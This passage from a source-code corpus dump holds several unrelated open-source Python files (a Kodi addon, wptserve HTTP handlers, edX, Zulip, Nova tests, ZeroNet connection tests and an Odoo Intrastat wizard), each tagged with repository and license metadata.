cm.append((unwatchedMenu, 'RunPlugin(%s?action=episodePlaycount&imdb=%s&tvdb=%s&season=%s&episode=%s&query=6)' % (sysaddon, imdb, tvdb, season, episode)))
meta.update({'playcount': 1, 'overlay': 7})
else:
cm.append((watchedMenu, 'RunPlugin(%s?action=episodePlaycount&imdb=%s&tvdb=%s&season=%s&episode=%s&query=7)' % (sysaddon, imdb, tvdb, season, episode)))
meta.update({'playcount': 0, 'overlay': 6})
except Exception as e:
control.log('#episodeDirectory %s' % e)
pass
#cm.append((control.lang(30263).encode('utf-8'), 'RunPlugin(%s?action=episodePlaycount&imdb=%s&tvdb=%s&season=%s&episode=%s&query=7)' % (sysaddon, imdb, tvdb, season, episode)))
#cm.append((control.lang(30264).encode('utf-8'), 'RunPlugin(%s?action=episodePlaycount&imdb=%s&tvdb=%s&season=%s&episode=%s&query=6)' % (sysaddon, imdb, tvdb, season, episode)))
if traktMode == True:
cm.append((control.lang(30265).encode('utf-8'), 'RunPlugin(%s?action=traktManager&name=%s&tvdb=%s&content=tvshow)' % (sysaddon, sysname, tvdb)))
if not imdb in favitems and not tvdb in favitems: cm.append((control.lang(30266).encode('utf-8'), 'RunPlugin(%s?action=addFavourite&meta=%s&content=tvshows)' % (sysaddon, sysmeta)))
else: cm.append((control.lang(30267).encode('utf-8'), 'RunPlugin(%s?action=deleteFavourite&meta=%s&content=tvshows)' % (sysaddon, sysmeta)))
cm.append((control.lang(30268).encode('utf-8'), 'RunPlugin(%s?action=tvshowToLibrary&tvshowtitle=%s&year=%s&imdb=%s&tmdb=%s&tvdb=%s&tvrage=%s)' % (sysaddon, systitle, year, imdb, tmdb, tvdb, tvrage)))
cm.append((control.lang(30273).encode('utf-8'), 'RunPlugin(%s?action=addView&content=episodes)' % sysaddon))
item = control.item(label=label, iconImage=thumb, thumbnailImage=thumb)
try: item.setArt({'poster': poster, 'tvshow.poster': poster, 'season.poster': poster, 'banner': banner, 'tvshow.banner': banner, 'season.banner': banner})
except: pass
if settingFanart == 'true' and not fanart == '0':
item.setProperty('Fanart_Image', fanart)
elif not addonFanart == None:
item.setProperty('Fanart_Image', addonFanart)
item.setInfo(type='Video', infoLabels = meta)
item.setProperty('Video', 'true')
#item.setProperty('IsPlayable', 'true')
item.setProperty('resumetime',str(0))
item.setProperty('totaltime',str(1))
item.addContextMenuItems(cm, replaceItems=True)
control.addItem(handle=int(sys.argv[1]), url=url, listitem=item, isFolder=isFolder)
except:
pass
control.content(int(sys.argv[1]), 'episodes')
control.directory(int(sys.argv[1]), cacheToDisc=cacheToDisc)
views.setView('episodes', {'skin.confluence': 504})
def addDirectory(self, items):
if items == None or len(items) == 0: return
sysaddon = sys.argv[0]
addonFanart = control.addonFanart()
addonThumb = control.addonThumb()
artPath = control.artPath()
for i in items:
try:
try: name = control.lang(i['name']).encode('utf-8')
except: name = i['name']
if not artPath == None: thumb = os.path.join(artPath, i['image'])
else: thumb = addonThumb
url = '%s?action=%s' % (sysaddon, i['action'])
try: url += '&url=%s' % urllib.quote_plus(i['url'])
except: pass
item = control.item(label=name, iconImage=thumb, thumbnailImage=thumb)
item.addContextMenuItems([], replaceItems=False)
if not addonFanart == None: item.setProperty('Fanart_Image', addonFanart)
control.addItem(handle=int(sys.argv[1]), url=url, listitem=item, isFolder=True)
except:
pass
control.directory(int(sys.argv[1]), cacheToDisc=True)
| gpl-2.0 |
hujiajie/chromium-crosswalk | third_party/WebKit/Tools/Scripts/webkitpy/thirdparty/wpt/wpt/tools/wptserve/wptserve/handlers.py | 45 | 11370 | import cgi
import json
import os
import traceback
import urllib
import urlparse
from constants import content_types
from pipes import Pipeline, template
from ranges import RangeParser
from request import Authentication
from response import MultipartContent
from utils import HTTPException
__all__ = ["file_handler", "python_script_handler",
"FunctionHandler", "handler", "json_handler",
"as_is_handler", "ErrorHandler", "BasicAuthHandler"]
def guess_content_type(path):
ext = os.path.splitext(path)[1].lstrip(".")
if ext in content_types:
return content_types[ext]
return "application/octet-stream"
def filesystem_path(base_path, request, url_base="/"):
if base_path is None:
base_path = request.doc_root
path = request.url_parts.path
if path.startswith(url_base):
path = path[len(url_base):]
if ".." in path:
raise HTTPException(404)
new_path = os.path.join(base_path, path)
# Otherwise setting path to / allows access outside the root directory
if not new_path.startswith(base_path):
raise HTTPException(404)
return new_path
class DirectoryHandler(object):
def __init__(self, base_path=None, url_base="/"):
self.base_path = base_path
self.url_base = url_base
def __call__(self, request, response):
if not request.url_parts.path.endswith("/"):
raise HTTPException(404)
path = filesystem_path(self.base_path, request, self.url_base)
assert os.path.isdir(path)
response.headers = [("Content-Type", "text/html")]
response.content = """<!doctype html>
<meta name="viewport" content="width=device-width">
<title>Directory listing for %(path)s</title>
<h1>Directory listing for %(path)s</h1>
<ul>
%(items)s
</li>
""" % {"path": cgi.escape(request.url_parts.path),
"items": "\n".join(self.list_items(request, path))}
def list_items(self, request, path):
# TODO: this won't actually list all routes, only the
# ones that correspond to a real filesystem path. It's
# not possible to list every route that will match
# something, but it should be possible to at least list the
# statically defined ones
base_path = request.url_parts.path
if not base_path.endswith("/"):
base_path += "/"
if base_path != "/":
link = urlparse.urljoin(base_path, "..")
yield ("""<li class="dir"><a href="%(link)s">%(name)s</a>""" %
{"link": link, "name": ".."})
for item in sorted(os.listdir(path)):
link = cgi.escape(urllib.quote(item))
if os.path.isdir(os.path.join(path, item)):
link += "/"
class_ = "dir"
else:
class_ = "file"
yield ("""<li class="%(class)s"><a href="%(link)s">%(name)s</a>""" %
{"link": link, "name": cgi.escape(item), "class": class_})
directory_handler = DirectoryHandler()
class FileHandler(object):
def __init__(self, base_path=None, url_base="/"):
self.base_path = base_path
self.url_base = url_base
self.directory_handler = DirectoryHandler(self.base_path)
def __call__(self, request, response):
path = filesystem_path(self.base_path, request, self.url_base)
if os.path.isdir(path):
return self.directory_handler(request, response)
try:
#This is probably racy with some other process trying to change the file
file_size = os.stat(path).st_size
response.headers.update(self.get_headers(request, path))
if "Range" in request.headers:
try:
byte_ranges = RangeParser()(request.headers['Range'], file_size)
except HTTPException as e:
if e.code == 416:
response.headers.set("Content-Range", "bytes */%i" % file_size)
raise
else:
byte_ranges = None
data = self.get_data(response, path, byte_ranges)
response.content = data
query = urlparse.parse_qs(request.url_parts.query)
pipeline = None
if "pipe" in query:
pipeline = Pipeline(query["pipe"][-1])
elif os.path.splitext(path)[0].endswith(".sub"):
pipeline = Pipeline("sub")
if pipeline is not None:
response = pipeline(request, response)
return response
except (OSError, IOError):
raise HTTPException(404)
def get_headers(self, request, path):
rv = self.default_headers(path)
rv.extend(self.load_headers(request, os.path.join(os.path.split(path)[0], "__dir__")))
rv.extend(self.load_headers(request, path))
return rv
def load_headers(self, request, path):
headers_path = path + ".sub.headers"
if os.path.exists(headers_path):
use_sub = True
else:
headers_path = path + ".headers"
use_sub = False
try:
with open(headers_path) as headers_file:
data = headers_file.read()
except IOError:
return []
else:
if use_sub:
data = template(request, data)
return [tuple(item.strip() for item in line.split(":", 1))
for line in data.splitlines() if line]
def get_data(self, response, path, byte_ranges):
with open(path, 'rb') as f:
if byte_ranges is None:
return f.read()
else:
response.status = 206
if len(byte_ranges) > 1:
parts_content_type, content = self.set_response_multipart(response,
byte_ranges,
f)
for byte_range in byte_ranges:
content.append_part(self.get_range_data(f, byte_range),
parts_content_type,
[("Content-Range", byte_range.header_value())])
return content
else:
response.headers.set("Content-Range", byte_ranges[0].header_value())
return self.get_range_data(f, byte_ranges[0])
def set_response_multipart(self, response, ranges, f):
parts_content_type = response.headers.get("Content-Type")
if parts_content_type:
parts_content_type = parts_content_type[-1]
else:
parts_content_type = None
content = MultipartContent()
response.headers.set("Content-Type", "multipart/byteranges; boundary=%s" % content.boundary)
return parts_content_type, content
def get_range_data(self, f, byte_range):
f.seek(byte_range.lower)
return f.read(byte_range.upper - byte_range.lower)
def default_headers(self, path):
return [("Content-Type", guess_content_type(path))]
file_handler = FileHandler()
class PythonScriptHandler(object):
def __init__(self, base_path=None, url_base="/"):
self.base_path = base_path
self.url_base = url_base
def __call__(self, request, response):
path = filesystem_path(self.base_path, request, self.url_base)
try:
environ = {"__file__": path}
execfile(path, environ, environ)
if "main" in environ:
handler = FunctionHandler(environ["main"])
handler(request, response)
else:
raise HTTPException(500, "No main function in script %s" % path)
except IOError:
raise HTTPException(404)
python_script_handler = PythonScriptHandler()
class FunctionHandler(object):
def __init__(self, func):
self.func = func
def __call__(self, request, response):
try:
rv = self.func(request, response)
except Exception:
msg = traceback.format_exc()
raise HTTPException(500, message=msg)
if rv is not None:
if isinstance(rv, tuple):
if len(rv) == 3:
status, headers, content = rv
response.status = status
elif len(rv) == 2:
headers, content = rv
else:
raise HTTPException(500)
response.headers.update(headers)
else:
content = rv
response.content = content
#The generic name here is so that this can be used as a decorator
def handler(func):
return FunctionHandler(func)
class JsonHandler(object):
def __init__(self, func):
self.func = func
def __call__(self, request, response):
return FunctionHandler(self.handle_request)(request, response)
def handle_request(self, request, response):
rv = self.func(request, response)
response.headers.set("Content-Type", "application/json")
enc = json.dumps
if isinstance(rv, tuple):
rv = list(rv)
value = tuple(rv[:-1] + [enc(rv[-1])])
length = len(value[-1])
else:
value = enc(rv)
length = len(value)
response.headers.set("Content-Length", length)
return value
def json_handler(func):
return JsonHandler(func)
class AsIsHandler(object):
def __init__(self, base_path=None, url_base="/"):
self.base_path = base_path
self.url_base = url_base
def __call__(self, request, response):
path = filesystem_path(self.base_path, request, self.url_base)
try:
with open(path) as f:
response.writer.write_content(f.read())
response.close_connection = True
except IOError:
raise HTTPException(404)
as_is_handler = AsIsHandler()
class BasicAuthHandler(object):
def __init__(self, handler, user, password):
"""
A Basic Auth handler
:Args:
- handler: a secondary handler for the request after authentication is successful (example file_handler)
- user: string of the valid user name or None if any / all credentials are allowed
- password: string of the password required
"""
self.user = user
self.password = password
self.handler = handler
def __call__(self, request, response):
if "authorization" not in request.headers:
response.status = 401
response.headers.set("WWW-Authenticate", "Basic")
return response
else:
auth = Authentication(request.headers)
if self.user is not None and (self.user != auth.username or self.password != auth.password):
response.set_error(403, "Invalid username or password")
return response
return self.handler(request, response)
basic_auth_handler = BasicAuthHandler(file_handler, None, None)
class ErrorHandler(object):
def __init__(self, status):
self.status = status
def __call__(self, request, response):
response.set_error(self.status)
| bsd-3-clause |
xinjiguaike/edx-platform | common/lib/xmodule/xmodule/annotator_token.py | 211 | 1542 | """
This file contains a function used to retrieve the token for the annotation backend
without having to create a view, but just returning a string instead.
It can be called from other files by using the following:
from xmodule.annotator_token import retrieve_token
"""
import datetime
from firebase_token_generator import create_token
def retrieve_token(userid, secret):
'''
Return a token for the backend of annotations.
It uses the course id to retrieve a variable that contains the secret
token found in inheritance.py. It also contains information of when
the token was issued. This will be stored with the user along with
the id for identification purposes in the backend.
'''
# the following five lines of code allows you to include the default timezone in the iso format
# for more information: http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
newhour, newmin = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60, 60)
newtime = "%s%+02d:%02d" % (dtnow.isoformat(), newhour, newmin)
# uses the issued time (UTC plus timezone), the consumer key and the user's email to maintain a
# federated system in the annotation backend server
custom_data = {"issuedAt": newtime, "consumerKey": secret, "userId": userid, "ttl": 86400}
newtoken = create_token(secret, custom_data)
return newtoken
| agpl-3.0 |
TigorC/zulip | tools/documentation_crawler/documentation_crawler/spiders/common/spiders.py | 9 | 3351 | #!/usr/bin/env python
from __future__ import print_function
import logging
import re
import scrapy
from scrapy import Request
from scrapy.linkextractors import IGNORED_EXTENSIONS
from scrapy.linkextractors.lxmlhtml import LxmlLinkExtractor
from scrapy.utils.url import url_has_any_extension
from typing import Any, Generator, List, Optional, Tuple
class BaseDocumentationSpider(scrapy.Spider):
name = None # type: Optional[str]
# Exclude domain address.
deny_domains = [] # type: List[str]
start_urls = [] # type: List[str]
deny = () # type: Tuple
file_extensions = ['.' + ext for ext in IGNORED_EXTENSIONS] # type: List[str]
def _has_extension(self, url):
# type: (str) -> bool
return url_has_any_extension(url, self.file_extensions)
def _is_external_url(self, url):
# type: (str) -> bool
return url.startswith('http') or self._has_extension(url)
def check_existing(self, response):
# type: (Any) -> None
self.log(response)
def check_permalink(self, response):
# type: (Any) -> None
self.log(response)
xpath_template = "//*[@id='{permalink}' or @name='{permalink}']"
m = re.match(r".+\#(?P<permalink>.*)$", response.request.url) # Get anchor value.
if not m:
return
permalink = m.group('permalink')
# Check permalink existing on response page.
if not response.selector.xpath(xpath_template.format(permalink=permalink)):
raise Exception(
"Permalink #{} is not found on page {}".format(permalink, response.request.url))
def parse(self, response):
# type: (Any) -> Generator[Request, None, None]
self.log(response)
for link in LxmlLinkExtractor(deny_domains=self.deny_domains, deny_extensions=[],
deny=self.deny,
canonicalize=False).extract_links(response):
callback = self.parse # type: Any
dont_filter = False
method = 'GET'
if self._is_external_url(link.url):
callback = self.check_existing
method = 'HEAD'
elif '#' in link.url:
dont_filter = True
callback = self.check_permalink
yield Request(link.url, method=method, callback=callback, dont_filter=dont_filter,
errback=self.error_callback)
def retry_request_with_get(self, request):
# type: (Request) -> Generator[Request, None, None]
request.method = 'GET'
request.dont_filter = True
yield request
def error_callback(self, failure):
# type: (Any) -> Optional[Generator[Any, None, None]]
if hasattr(failure.value, 'response') and failure.value.response:
response = failure.value.response
if response.status == 404:
raise Exception('Page not found: {}'.format(response))
if response.status == 405 and response.request.method == 'HEAD':
# Method 'HEAD' not allowed, repeat request with 'GET'
return self.retry_request_with_get(response.request)
self.log("Error! Please check link: {}".format(response), logging.ERROR)
else:
raise Exception(failure.value)
| apache-2.0 |
timabbott/zulip | zerver/webhooks/gci/view.py | 4 | 5316 | from typing import Any, Dict, Optional
from django.http import HttpRequest, HttpResponse
from zerver.decorator import api_key_only_webhook_view
from zerver.lib.request import REQ, has_request_variables
from zerver.lib.response import json_success
from zerver.lib.webhooks.common import check_send_webhook_message
from zerver.models import UserProfile
GCI_MESSAGE_TEMPLATE = '**{actor}** {action} the task [{task_name}]({task_url}).'
GCI_TOPIC_TEMPLATE = '{student_name}'
def build_instance_url(instance_id: str) -> str:
return f"https://codein.withgoogle.com/dashboard/task-instances/{instance_id}/"
class UnknownEventType(Exception):
pass
def get_abandon_event_body(payload: Dict[str, Any]) -> str:
return GCI_MESSAGE_TEMPLATE.format(
actor=payload['task_claimed_by'],
action='{}ed'.format(payload['event_type']),
task_name=payload['task_definition_name'],
task_url=build_instance_url(payload['task_instance']),
)
def get_submit_event_body(payload: Dict[str, Any]) -> str:
return GCI_MESSAGE_TEMPLATE.format(
actor=payload['task_claimed_by'],
action='{}ted'.format(payload['event_type']),
task_name=payload['task_definition_name'],
task_url=build_instance_url(payload['task_instance']),
)
def get_comment_event_body(payload: Dict[str, Any]) -> str:
return GCI_MESSAGE_TEMPLATE.format(
actor=payload['author'],
action='{}ed on'.format(payload['event_type']),
task_name=payload['task_definition_name'],
task_url=build_instance_url(payload['task_instance']),
)
def get_claim_event_body(payload: Dict[str, Any]) -> str:
return GCI_MESSAGE_TEMPLATE.format(
actor=payload['task_claimed_by'],
action='{}ed'.format(payload['event_type']),
task_name=payload['task_definition_name'],
task_url=build_instance_url(payload['task_instance']),
)
def get_approve_event_body(payload: Dict[str, Any]) -> str:
return GCI_MESSAGE_TEMPLATE.format(
actor=payload['author'],
action='{}d'.format(payload['event_type']),
task_name=payload['task_definition_name'],
task_url=build_instance_url(payload['task_instance']),
)
def get_approve_pending_pc_event_body(payload: Dict[str, Any]) -> str:
template = "{} (pending parental consent).".format(GCI_MESSAGE_TEMPLATE.rstrip('.'))
return template.format(
actor=payload['author'],
action='approved',
task_name=payload['task_definition_name'],
task_url=build_instance_url(payload['task_instance']),
)
def get_needswork_event_body(payload: Dict[str, Any]) -> str:
template = "{} for more work.".format(GCI_MESSAGE_TEMPLATE.rstrip('.'))
return template.format(
actor=payload['author'],
action='submitted',
task_name=payload['task_definition_name'],
task_url=build_instance_url(payload['task_instance']),
)
def get_extend_event_body(payload: Dict[str, Any]) -> str:
template = "{} by {days} day(s).".format(GCI_MESSAGE_TEMPLATE.rstrip('.'),
days=payload['extension_days'])
return template.format(
actor=payload['author'],
action='extended the deadline for',
task_name=payload['task_definition_name'],
task_url=build_instance_url(payload['task_instance']),
)
def get_unassign_event_body(payload: Dict[str, Any]) -> str:
return GCI_MESSAGE_TEMPLATE.format(
actor=payload['author'],
action='unassigned **{student}** from'.format(student=payload['task_claimed_by']),
task_name=payload['task_definition_name'],
task_url=build_instance_url(payload['task_instance']),
)
def get_outoftime_event_body(payload: Dict[str, Any]) -> str:
return 'The deadline for the task [{task_name}]({task_url}) has passed.'.format(
task_name=payload['task_definition_name'],
task_url=build_instance_url(payload['task_instance']),
)
@api_key_only_webhook_view("Google-Code-In")
@has_request_variables
def api_gci_webhook(request: HttpRequest, user_profile: UserProfile,
payload: Dict[str, Any]=REQ(argument_type='body')) -> HttpResponse:
event = get_event(payload)
if event is not None:
body = get_body_based_on_event(event)(payload)
subject = GCI_TOPIC_TEMPLATE.format(
student_name=payload['task_claimed_by'],
)
check_send_webhook_message(request, user_profile, subject, body)
return json_success()
EVENTS_FUNCTION_MAPPER = {
'abandon': get_abandon_event_body,
'approve': get_approve_event_body,
'approve-pending-pc': get_approve_pending_pc_event_body,
'claim': get_claim_event_body,
'comment': get_comment_event_body,
'extend': get_extend_event_body,
'needswork': get_needswork_event_body,
'outoftime': get_outoftime_event_body,
'submit': get_submit_event_body,
'unassign': get_unassign_event_body,
}
def get_event(payload: Dict[str, Any]) -> Optional[str]:
event = payload['event_type']
if event in EVENTS_FUNCTION_MAPPER:
return event
raise UnknownEventType(f"Event '{event}' is unknown and cannot be handled") # nocoverage
def get_body_based_on_event(event: str) -> Any:
return EVENTS_FUNCTION_MAPPER[event]
| apache-2.0 |
LoHChina/nova | nova/tests/unit/api/openstack/compute/contrib/test_floating_ips_bulk.py | 21 | 8799 | # Copyright 2012 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
import netaddr
from oslo_config import cfg
import webob
from nova.api.openstack.compute.contrib import floating_ips_bulk as fipbulk_v2
from nova.api.openstack.compute.plugins.v3 import floating_ips_bulk as\
fipbulk_v21
from nova import context
from nova import exception
from nova import objects
from nova import test
from nova.tests.unit.api.openstack import fakes
CONF = cfg.CONF
class FloatingIPBulkV21(test.TestCase):
floating_ips_bulk = fipbulk_v21
bad_request = exception.ValidationError
def setUp(self):
super(FloatingIPBulkV21, self).setUp()
self.context = context.get_admin_context()
self.controller = self.floating_ips_bulk.FloatingIPBulkController()
self.req = fakes.HTTPRequest.blank('')
def _setup_floating_ips(self, ip_range):
body = {'floating_ips_bulk_create': {'ip_range': ip_range}}
res_dict = self.controller.create(self.req, body=body)
response = {"floating_ips_bulk_create": {
'ip_range': ip_range,
'pool': CONF.default_floating_pool,
'interface': CONF.public_interface}}
self.assertEqual(res_dict, response)
def test_create_ips(self):
ip_range = '192.168.1.0/28'
self._setup_floating_ips(ip_range)
def test_create_ips_pool(self):
ip_range = '10.0.1.0/29'
pool = 'a new pool'
body = {'floating_ips_bulk_create':
{'ip_range': ip_range,
'pool': pool}}
res_dict = self.controller.create(self.req, body=body)
response = {"floating_ips_bulk_create": {
'ip_range': ip_range,
'pool': pool,
'interface': CONF.public_interface}}
self.assertEqual(res_dict, response)
def test_list_ips(self):
self._test_list_ips(self.req)
def _test_list_ips(self, req):
ip_range = '192.168.1.1/28'
self._setup_floating_ips(ip_range)
res_dict = self.controller.index(req)
ip_info = [{'address': str(ip_addr),
'pool': CONF.default_floating_pool,
'interface': CONF.public_interface,
'project_id': None,
'instance_uuid': None,
'fixed_ip': None}
for ip_addr in netaddr.IPNetwork(ip_range).iter_hosts()]
response = {'floating_ip_info': ip_info}
self.assertEqual(res_dict, response)
def test_list_ips_associated(self):
self._test_list_ips_associated(self.req)
@mock.patch('nova.objects.FloatingIPList.get_all')
def _test_list_ips_associated(self, req, mock_get):
instance_uuid = "fake-uuid"
fixed_address = "10.0.0.1"
floating_address = "192.168.0.1"
fixed_ip = objects.FixedIP(instance_uuid=instance_uuid,
address=fixed_address)
floating_ip = objects.FloatingIP(address=floating_address,
fixed_ip=fixed_ip,
pool=CONF.default_floating_pool,
interface=CONF.public_interface,
project_id=None)
floating_list = objects.FloatingIPList(objects=[floating_ip])
mock_get.return_value = floating_list
res_dict = self.controller.index(req)
ip_info = [{'address': floating_address,
'pool': CONF.default_floating_pool,
'interface': CONF.public_interface,
'project_id': None,
'instance_uuid': instance_uuid,
'fixed_ip': fixed_address}]
response = {'floating_ip_info': ip_info}
self.assertEqual(res_dict, response)
def test_list_ip_by_host(self):
self._test_list_ip_by_host(self.req)
def _test_list_ip_by_host(self, req):
ip_range = '192.168.1.1/28'
self._setup_floating_ips(ip_range)
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.show, req, 'host')
def test_delete_ips(self):
self._test_delete_ips(self.req)
def _test_delete_ips(self, req):
ip_range = '192.168.1.0/29'
self._setup_floating_ips(ip_range)
body = {'ip_range': ip_range}
res_dict = self.controller.update(req, "delete", body=body)
response = {"floating_ips_bulk_delete": ip_range}
self.assertEqual(res_dict, response)
# Check that the IPs are actually deleted
res_dict = self.controller.index(req)
response = {'floating_ip_info': []}
self.assertEqual(res_dict, response)
def test_create_duplicate_fail(self):
ip_range = '192.168.1.0/30'
self._setup_floating_ips(ip_range)
ip_range = '192.168.1.0/29'
body = {'floating_ips_bulk_create': {'ip_range': ip_range}}
self.assertRaises(webob.exc.HTTPConflict, self.controller.create,
self.req, body=body)
def test_create_bad_cidr_fail(self):
# netaddr can't handle /32 or 31 cidrs
ip_range = '192.168.1.1/32'
body = {'floating_ips_bulk_create': {'ip_range': ip_range}}
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
self.req, body=body)
def test_create_invalid_cidr_fail(self):
ip_range = 'not a cidr'
body = {'floating_ips_bulk_create': {'ip_range': ip_range}}
self.assertRaises(self.bad_request, self.controller.create,
self.req, body=body)
class FloatingIPBulkV2(FloatingIPBulkV21):
floating_ips_bulk = fipbulk_v2
bad_request = webob.exc.HTTPBadRequest
def setUp(self):
super(FloatingIPBulkV2, self).setUp()
self.non_admin_req = fakes.HTTPRequest.blank('')
self.admin_req = fakes.HTTPRequest.blank('', use_admin_context=True)
def test_list_ips_with_non_admin(self):
ip_range = '192.168.1.1/28'
self._setup_floating_ips(ip_range)
self.assertRaises(exception.AdminRequired,
self.controller.index, self.non_admin_req)
def test_list_ip_with_non_admin(self):
ip_range = '192.168.1.1/28'
self._setup_floating_ips(ip_range)
self.assertRaises(exception.AdminRequired, self.controller.show,
self.non_admin_req, "host")
def test_delete_ips(self):
self._test_delete_ips(self.admin_req)
def test_list_ip_by_host(self):
self._test_list_ip_by_host(self.admin_req)
def test_list_ips_associated(self):
self._test_list_ips_associated(self.admin_req)
def test_list_ips(self):
self._test_list_ips(self.admin_req)
class FloatingIPBulkPolicyEnforcementV21(test.NoDBTestCase):
def setUp(self):
super(FloatingIPBulkPolicyEnforcementV21, self).setUp()
self.controller = fipbulk_v21.FloatingIPBulkController()
self.req = fakes.HTTPRequest.blank('')
def _common_policy_check(self, func, *arg, **kwarg):
rule_name = "os_compute_api:os-floating-ips-bulk"
rule = {rule_name: "project:non_fake"}
self.policy.set_rules(rule)
exc = self.assertRaises(
exception.PolicyNotAuthorized, func, *arg, **kwarg)
self.assertEqual(
"Policy doesn't allow %s to be performed." % rule_name,
exc.format_message())
def test_index_policy_failed(self):
self._common_policy_check(self.controller.index, self.req)
def test_show_ip_policy_failed(self):
self._common_policy_check(self.controller.show, self.req, "host")
def test_create_policy_failed(self):
ip_range = '192.168.1.0/28'
body = {'floating_ips_bulk_create': {'ip_range': ip_range}}
self._common_policy_check(self.controller.create, self.req, body=body)
def test_update_policy_failed(self):
ip_range = '192.168.1.0/29'
body = {'ip_range': ip_range}
self._common_policy_check(self.controller.update, self.req,
"delete", body=body)
| apache-2.0 |
kustomzone/Fuzium | core/src/Test/TestConnectionServer.py | 7 | 3354 | import time
import gevent
import pytest
from Crypt import CryptConnection
from Connection import ConnectionServer
@pytest.mark.usefixtures("resetSettings")
class TestConnection:
def testSslConnection(self, file_server):
file_server.ip_incoming = {} # Reset flood protection
client = ConnectionServer("127.0.0.1", 1545)
assert file_server != client
# Connect to myself
connection = client.getConnection("127.0.0.1", 1544)
assert len(file_server.connections) == 1
assert len(file_server.ips) == 1
assert connection.handshake
assert connection.crypt
# Close connection
connection.close()
client.stop()
time.sleep(0.01)
assert len(file_server.connections) == 0
assert len(file_server.ips) == 0
def testRawConnection(self, file_server):
file_server.ip_incoming = {} # Reset flood protection
client = ConnectionServer("127.0.0.1", 1545)
assert file_server != client
# Remove all supported crypto
crypt_supported_bk = CryptConnection.manager.crypt_supported
CryptConnection.manager.crypt_supported = []
connection = client.getConnection("127.0.0.1", 1544)
assert len(file_server.connections) == 1
assert not connection.crypt
# Close connection
connection.close()
client.stop()
time.sleep(0.01)
assert len(file_server.connections) == 0
# Reset supported crypts
CryptConnection.manager.crypt_supported = crypt_supported_bk
def testPing(self, file_server, site):
file_server.ip_incoming = {} # Reset flood protection
client = ConnectionServer("127.0.0.1", 1545)
connection = client.getConnection("127.0.0.1", 1544)
assert connection.ping()
connection.close()
client.stop()
def testGetConnection(self, file_server):
file_server.ip_incoming = {} # Reset flood protection
client = ConnectionServer("127.0.0.1", 1545)
connection = client.getConnection("127.0.0.1", 1544)
# Get connection by ip/port
connection2 = client.getConnection("127.0.0.1", 1544)
assert connection == connection2
# Get connection by peerid
assert not client.getConnection("127.0.0.1", 1544, peer_id="notexists", create=False)
connection2 = client.getConnection("127.0.0.1", 1544, peer_id=connection.handshake["peer_id"], create=False)
assert connection2 == connection
connection.close()
client.stop()
def testFloodProtection(self, file_server):
file_server.ip_incoming = {} # Reset flood protection
whitelist = file_server.whitelist # Save for reset
file_server.whitelist = [] # Disable 127.0.0.1 whitelist
client = ConnectionServer("127.0.0.1", 1545)
# Only allow 6 connection in 1 minute
for reconnect in range(6):
connection = client.getConnection("127.0.0.1", 1544)
assert connection.handshake
connection.close()
# The 7. one will timeout
with pytest.raises(gevent.Timeout):
with gevent.Timeout(0.1):
connection = client.getConnection("127.0.0.1", 1544)
# Reset whitelist
file_server.whitelist = whitelist
| mit |
Grirrane/odoo | addons/l10n_be_intrastat/wizard/xml_decl.py | 205 | 17873 | # -*- encoding: utf-8 -*-
##############################################################################
#
# Odoo, Open Source Business Applications
# Copyright (C) 2014-2015 Odoo S.A. <http://www.odoo.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import base64
import xml.etree.ElementTree as ET
from collections import namedtuple
from datetime import datetime
from openerp import exceptions, SUPERUSER_ID, tools
from openerp.osv import fields, osv
from openerp.tools.translate import _
INTRASTAT_XMLNS = 'http://www.onegate.eu/2010-01-01'
class xml_decl(osv.TransientModel):
"""
Intrastat XML Declaration
"""
_name = "l10n_be_intrastat_xml.xml_decl"
_description = 'Intrastat XML Declaration'
def _get_tax_code(self, cr, uid, context=None):
obj_tax_code = self.pool.get('account.tax.code')
obj_user = self.pool.get('res.users')
company_id = obj_user.browse(cr, uid, uid, context=context).company_id.id
tax_code_ids = obj_tax_code.search(cr, uid, [('company_id', '=', company_id),
('parent_id', '=', False)],
context=context)
return tax_code_ids and tax_code_ids[0] or False
def _get_def_monthyear(self, cr, uid, context=None):
td = datetime.strptime(fields.date.context_today(self, cr, uid, context=context),
tools.DEFAULT_SERVER_DATE_FORMAT).date()
return td.strftime('%Y'), td.strftime('%m')
def _get_def_month(self, cr, uid, context=None):
return self._get_def_monthyear(cr, uid, context=context)[1]
def _get_def_year(self, cr, uid, context=None):
return self._get_def_monthyear(cr, uid, context=context)[0]
_columns = {
'name': fields.char('File Name'),
'month': fields.selection([('01','January'), ('02','February'), ('03','March'),
('04','April'), ('05','May'), ('06','June'), ('07','July'),
('08','August'), ('09','September'), ('10','October'),
('11','November'), ('12','December')], 'Month', required=True),
'year': fields.char('Year', size=4, required=True),
'tax_code_id': fields.many2one('account.tax.code', 'Company Tax Chart',
domain=[('parent_id', '=', False)], required=True),
'arrivals': fields.selection([('be-exempt', 'Exempt'),
('be-standard', 'Standard'),
('be-extended', 'Extended')],
'Arrivals', required=True),
'dispatches': fields.selection([('be-exempt', 'Exempt'),
('be-standard', 'Standard'),
('be-extended', 'Extended')],
'Dispatches', required=True),
'file_save': fields.binary('Intrastat Report File', readonly=True),
'state': fields.selection([('draft', 'Draft'), ('download', 'Download')], string="State"),
}
_defaults = {
'arrivals': 'be-standard',
'dispatches': 'be-standard',
'name': 'intrastat.xml',
'tax_code_id': _get_tax_code,
'month': _get_def_month,
'year': _get_def_year,
'state': 'draft',
}
def _company_warning(self, cr, uid, translated_msg, context=None):
""" Raise a error with custom message, asking user to configure company settings """
